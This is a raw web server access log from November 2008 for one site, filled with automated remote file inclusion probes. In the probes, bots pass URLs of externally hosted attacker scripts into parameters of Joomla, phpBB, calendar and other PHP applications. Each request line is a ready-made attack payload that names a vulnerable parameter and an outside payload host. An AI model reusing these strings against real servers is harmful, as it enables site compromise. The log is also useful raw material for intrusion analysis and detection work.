70.38.12.204 - - [10/Nov/2008:09:47:22 -0800] "GET /logs/access_080912.log//calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.182.252.176 - - [10/Nov/2008:09:47:23 -0800] "GET /calendar.php?p=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.182.252.176 - - [10/Nov/2008:09:47:24 -0800] "GET /calendar.php?p=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.85.130.159 - - [10/Nov/2008:09:47:24 -0800] "GET /logs/access_080526.log//calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
195.85.130.159 - - [10/Nov/2008:09:47:24 -0800] "GET /calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.108.71.148 - - [10/Nov/2008:09:47:30 -0800] "GET /logs///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.108.71.148 - - [10/Nov/2008:09:47:31 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.109.250.156 - - [10/Nov/2008:09:47:40 -0800] "GET /logs/access_081021.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://usuarios.lycos.es/xQt/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
61.109.250.156 - - [10/Nov/2008:09:47:40 -0800] "GET /logs/access_081021.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://usuarios.lycos.es/xQt/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
61.109.250.156 - - [10/Nov/2008:09:47:41 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://usuarios.lycos.es/xQt/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
61.109.250.156 - - [10/Nov/2008:09:47:41 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://usuarios.lycos.es/xQt/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
61.109.250.156 - - [10/Nov/2008:09:47:42 -0800] "GET /logs/access_081021.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://usuarios.lycos.es/xQt/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
61.109.250.156 - - [10/Nov/2008:09:47:42 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://usuarios.lycos.es/xQt/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
81.182.252.176 - - [10/Nov/2008:09:47:47 -0800] "GET /logs/access_080428.log//calendar.php?p=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:09:47:47 -0800] "GET /logs/access_080329.log//?pag=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:09:47:47 -0800] "GET /logs/access_080602.log//?pag=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
81.182.252.176 - - [10/Nov/2008:09:47:48 -0800] "GET /calendar.php?p=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:09:47:48 -0800] "GET /logs//?pag=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 200 73026 "-" "libwww-perl/5.814" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:09:47:48 -0800] "GET /?pag=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 200 94676 "-" "libwww-perl/5.814" "www.dmulk.com"
81.182.252.176 - - [10/Nov/2008:09:47:50 -0800] "GET /logs/access_080526.log//calendar.php?p=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
61.100.183.174 - - [10/Nov/2008:09:47:50 -0800] "GET /logs/access_081021.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://usuarios.lycos.es/xQt/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
61.100.183.174 - - [10/Nov/2008:09:47:51 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://usuarios.lycos.es/xQt/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.53.180.196 - - [10/Nov/2008:09:47:51 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.dis-daten-it.de/images/bo.do??? HTTP/1.1" 200 50 "-" "libwww-perl/5.65" "www.dmulk.com"
80.53.180.196 - - [10/Nov/2008:09:47:51 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.dis-daten-it.de/images/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.53.180.196 - - [10/Nov/2008:09:47:52 -0800] "GET /logs/access_080308.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.dis-daten-it.de/images/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.182.252.176 - - [10/Nov/2008:09:47:52 -0800] "GET /logs/access_080428.log//calendar.php?p=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
81.182.252.176 - - [10/Nov/2008:09:47:53 -0800] "GET /calendar.php?p=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.135.37.24 - - [10/Nov/2008:09:47:54 -0800] "GET /logs/access_080921.log/pages.php?page=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.182.252.176 - - [10/Nov/2008:09:47:56 -0800] "GET /logs/access_080526.log//calendar.php?p=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:09:47:58 -0800] "GET /logs/access_080329.log//?p=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:09:47:58 -0800] "GET /logs/access_080602.log//?p=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:09:47:58 -0800] "GET /logs//?p=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 200 73026 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:09:47:59 -0800] "GET /?p=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 200 94571 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.14.50 - - [10/Nov/2008:09:48:03 -0800] "GET /logs//calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.14.50 - - [10/Nov/2008:09:48:03 -0800] "GET /calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.14.50 - - [10/Nov/2008:09:48:05 -0800] "GET /logs//calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.14.50 - - [10/Nov/2008:09:48:05 -0800] "GET /calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.12.204 - - [10/Nov/2008:09:48:07 -0800] "GET /logs/access_080428.log//calendar.php?p=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:09:48:07 -0800] "GET /logs/index.php?option=com_content&task=§ionid=&id=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:09:48:07 -0800] "GET /logs/access_080911.log/index.php?option=com_content&task=§ionid=&id=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.144.158.163 - - [10/Nov/2008:09:48:07 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.12.204 - - [10/Nov/2008:09:48:08 -0800] "GET /calendar.php?p=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:09:48:08 -0800] "GET /index.php?option=com_content&task=§ionid=&id=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 200 94941 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.12.204 - - [10/Nov/2008:09:48:08 -0800] "GET /logs//calendar.php?p=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.144.158.163 - - [10/Nov/2008:09:48:10 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.12.204 - - [10/Nov/2008:09:48:12 -0800] "GET /logs/access_080526.log//calendar.php?p=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.144.158.163 - - [10/Nov/2008:09:48:13 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:09:48:14 -0800] "GET /logs/access_080204.log/index.php?option=com_content&task=§ionid=&id=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.38.186.235 - - [10/Nov/2008:09:48:16 -0800] "GET /logs//calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.38.186.235 - - [10/Nov/2008:09:48:16 -0800] "GET /calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.38.186.235 - - [10/Nov/2008:09:48:17 -0800] "GET /logs//calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.38.186.235 - - [10/Nov/2008:09:48:17 -0800] "GET /calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.85.130.159 - - [10/Nov/2008:09:48:23 -0800] "GET /logs/access_080912.log//calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
212.76.68.90 - - [10/Nov/2008:09:48:27 -0800] "GET /authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.182.252.176 - - [10/Nov/2008:09:48:31 -0800] "GET /logs/access_080428.log//calendar.php?p=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.182.252.176 - - [10/Nov/2008:09:48:32 -0800] "GET /calendar.php?p=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.182.252.176 - - [10/Nov/2008:09:48:36 -0800] "GET /logs//calendar.php?p=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.182.252.176 - - [10/Nov/2008:09:48:38 -0800] "GET /logs/access_080526.log//calendar.php?p=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.182.252.176 - - [10/Nov/2008:09:48:40 -0800] "GET /logs/access_080428.log//calendar.php?p=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.182.252.176 - - [10/Nov/2008:09:48:41 -0800] "GET /calendar.php?p=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.182.252.176 - - [10/Nov/2008:09:48:42 -0800] "GET /logs//calendar.php?p=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.76.68.90 - - [10/Nov/2008:09:48:44 -0800] "GET /logs/access_080606.log//index.php?DOCUMENT_ROOT=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.85.130.159 - - [10/Nov/2008:09:48:44 -0800] "GET /logs//calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.85.130.159 - - [10/Nov/2008:09:48:44 -0800] "GET /calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.85.130.159 - - [10/Nov/2008:09:48:45 -0800] "GET /logs//calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.182.252.176 - - [10/Nov/2008:09:48:45 -0800] "GET /logs/access_080526.log//calendar.php?p=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.85.130.159 - - [10/Nov/2008:09:48:45 -0800] "GET /calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.125.14.50 - - [10/Nov/2008:09:48:58 -0800] "GET /atom.php5?page=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.109.250.156 - - [10/Nov/2008:09:49:04 -0800] "GET /logs/access_081015.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://usuarios.lycos.es/xQt/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
61.109.250.156 - - [10/Nov/2008:09:49:04 -0800] "GET /logs/access_081015.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://usuarios.lycos.es/xQt/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
61.109.250.156 - - [10/Nov/2008:09:49:04 -0800] "GET /logs/access_081015.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://usuarios.lycos.es/xQt/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
124.81.96.76 - - [10/Nov/2008:09:49:08 -0800] "GET /op=*year=*month=/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:09:49:12 -0800] "GET /?pag=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 200 94585 "-" "libwww-perl/5.814" "www.dmulk.com"
208.38.186.235 - - [10/Nov/2008:09:49:18 -0800] "GET /atom.php5?page=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
61.100.183.174 - - [10/Nov/2008:09:49:32 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://usuarios.lycos.es/xQt/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.85.130.159 - - [10/Nov/2008:09:49:37 -0800] "GET /logs/book.php5?page=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.85.130.159 - - [10/Nov/2008:09:49:38 -0800] "GET /book.php5?page=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:09:49:38 -0800] "GET /logs/access_080329.log//?pag=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:09:49:38 -0800] "GET /logs/access_080602.log//?pag=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:09:49:38 -0800] "GET /logs//?pag=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 200 73026 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:09:49:38 -0800] "GET /?pag=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 200 94569 "-" "libwww-perl/5.805" "www.dmulk.com"
195.85.130.159 - - [10/Nov/2008:09:49:40 -0800] "GET /logs/book.php5?page=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.85.130.159 - - [10/Nov/2008:09:49:40 -0800] "GET /book.php5?page=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.144.158.163 - - [10/Nov/2008:09:49:49 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.144.158.163 - - [10/Nov/2008:09:49:51 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
146.164.26.31 - - [10/Nov/2008:09:49:51 -0800] "GET /logs/access_080409.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://skill-station.net/editor/loco.me.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
146.164.26.31 - - [10/Nov/2008:09:49:51 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://skill-station.net/editor/loco.me.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
146.164.26.31 - - [10/Nov/2008:09:49:51 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://skill-station.net/editor/loco.me.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
146.164.26.31 - - [10/Nov/2008:09:49:51 -0800] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://skill-station.net/editor/loco.me.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
202.144.158.163 - - [10/Nov/2008:09:49:52 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.12.204 - - [10/Nov/2008:09:49:53 -0800] "GET /logs/access_080313.log//calendar.php?s=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
61.100.183.174 - - [10/Nov/2008:09:49:53 -0800] "GET /logs/access_081015.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://usuarios.lycos.es/xQt/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.38.12.204 - - [10/Nov/2008:09:49:54 -0800] "GET /calendar.php?s=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
61.109.250.156 - - [10/Nov/2008:09:49:54 -0800] "GET /logs/scripts.log/tools/send_reminders.php?noSet=0&includedir=http://usuarios.lycos.es/xQt/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.109.250.156 - - [10/Nov/2008:09:49:54 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://usuarios.lycos.es/xQt/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.109.250.156 - - [10/Nov/2008:09:49:55 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://usuarios.lycos.es/xQt/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.109.250.156 - - [10/Nov/2008:09:50:05 -0800] "GET /logs/scripts.log/tools/send_reminders.php?noSet=0&includedir=http://usuarios.lycos.es/xQt/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.109.250.156 - - [10/Nov/2008:09:50:06 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://usuarios.lycos.es/xQt/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.109.250.156 - - [10/Nov/2008:09:50:06 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://usuarios.lycos.es/xQt/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.109.250.156 - - [10/Nov/2008:09:50:13 -0800] "GET /logs/scripts.log/tools/send_reminders.php?noSet=0&includedir=http://usuarios.lycos.es/xQt/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.109.250.156 - - [10/Nov/2008:09:50:14 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://usuarios.lycos.es/xQt/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.109.250.156 - - [10/Nov/2008:09:50:14 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://usuarios.lycos.es/xQt/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.64.11.254 - - [10/Nov/2008:09:50:57 -0800] "GET /logs/access_081028.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.talleressanxenxo.com/templates/.guardian/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
86.64.11.254 - - [10/Nov/2008:09:50:58 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.talleressanxenxo.com/templates/.guardian/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
86.64.11.254 - - [10/Nov/2008:09:50:58 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.talleressanxenxo.com/templates/.guardian/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
86.64.11.254 - - [10/Nov/2008:09:50:59 -0800] "GET /logs/access_080810.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.talleressanxenxo.com/templates/.guardian/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
61.58.35.82 - - [10/Nov/2008:09:51:09 -0800] "GET /logs//components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.58.35.82 - - [10/Nov/2008:09:51:09 -0800] "GET /components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:09:51:13 -0800] "GET /logs/access_080511.log//appserv/main.php?appserv_root=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:09:51:15 -0800] "GET /appserv/main.php?appserv_root=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:09:51:17 -0800] "GET /logs//appserv/main.php?appserv_root=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
221.12.138.78 - - [10/Nov/2008:09:51:24 -0800] "GET /errors.php?error=http://rfiscan.ucoz.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
221.12.138.78 - - [10/Nov/2008:09:51:24 -0800] "GET /logs/errors.php?error=http://rfiscan.ucoz.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:09:51:31 -0800] "GET /logs/access_080511.log//appserv/main.php?appserv_root=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:09:51:31 -0800] "GET /appserv/main.php?appserv_root=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:09:51:33 -0800] "GET /logs//appserv/main.php?appserv_root=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:09:51:35 -0800] "GET /appserv/main.php?appserv_root=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:09:51:35 -0800] "GET /logs/access_080511.log//appserv/main.php?appserv_root=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
